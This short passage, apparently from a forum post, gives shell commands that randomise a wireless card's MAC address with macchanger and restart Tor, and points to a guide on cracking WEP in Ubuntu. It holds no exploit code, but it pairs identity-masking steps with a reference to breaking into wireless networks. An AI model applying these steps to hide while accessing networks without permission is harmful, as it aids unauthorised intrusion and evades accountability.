ifconfig ath0 down && macchanger -r ath0 && ifconfig ath0 up

After it connects, I restart tor:

/etc/init.d/tor restart

(As another reference for you, this site keeps turning up as a guide to cracking WEP in Ubuntu.)